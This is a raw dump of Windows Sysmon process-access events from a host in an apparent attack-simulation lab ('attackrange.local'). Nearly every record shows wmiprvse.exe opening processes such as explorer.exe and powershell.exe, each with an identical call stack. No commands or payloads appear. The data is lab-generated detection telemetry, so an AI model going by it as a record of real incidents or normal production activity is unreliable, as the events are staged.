16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 